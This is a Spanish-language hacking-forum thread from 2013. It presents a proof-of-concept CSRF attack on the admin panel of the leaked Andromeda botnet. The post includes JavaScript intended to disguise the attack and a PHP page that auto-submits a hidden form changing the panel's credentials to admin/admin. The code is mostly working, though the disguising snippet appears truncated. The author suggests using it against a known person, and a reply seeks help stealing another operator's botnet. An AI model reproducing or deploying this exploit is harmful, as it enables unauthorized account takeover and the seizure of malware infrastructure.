send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CSRF Andromeda Botnet [ POC Change Password]

  • 2 Respuestas
  • 1669 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« en: Julio 27, 2013, 10:57:18 am »
Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('');
}

writeIf('http://127.0.0.1/csrf.php');

Simplemente, si tenemos nuestro csrf subido a nuestra web: ahfiuahfa.com , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<script src="a.js"></script>
Pues aqui el csrf,
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>

Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado PW[N]ED

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • PW[N]ED underc0de.-!
    • Ver Perfil
  • Skype: the.joker.crack
« Respuesta #1 en: Julio 29, 2013, 09:19:31 pm »
peeerdona pero no entendi nada :S , subi el csrf en .php , a mi web , y tengo un cpanel de un botnet andromeda que no es mio , es de otro loco que no se qien es , pero mi idea era robar esa andromeda bot , pero no se cmo tendrias skype , facebook o algo? gracias :)

Desconectado peruvianrulez

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: peruvianrulez
« Respuesta #2 en: Julio 30, 2013, 07:46:47 pm »
podrias ser mas especifico  o podes hacer un comentario en privado? ... gracias

 

¿Te gustó el post? COMPARTILO!



Webot Botnet - Frameshock

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3002
Último mensaje Marzo 13, 2015, 12:44:48 pm
por n4pst3r
Crackear password de administrador en windows usando Backtrack 3

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1990
Último mensaje Febrero 25, 2010, 11:25:50 am
por dracko.rx
PHP MatchMaker Remote User Reset Password Vulnerability

Iniciado por hielasangre

Respuestas: 0
Vistas: 1333
Último mensaje Agosto 27, 2011, 05:43:42 pm
por hielasangre
Grave Vulnerabilidad en MySQL/MariaDB (Autenticación sin Password)

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2276
Último mensaje Junio 12, 2012, 04:20:50 pm
por ANTRAX
Descubriendo el método en que joomla encripta los password

Iniciado por ~ Yoya ~

Respuestas: 2
Vistas: 3440
Último mensaje Diciembre 28, 2012, 08:30:22 pm
por ~ Yoya ~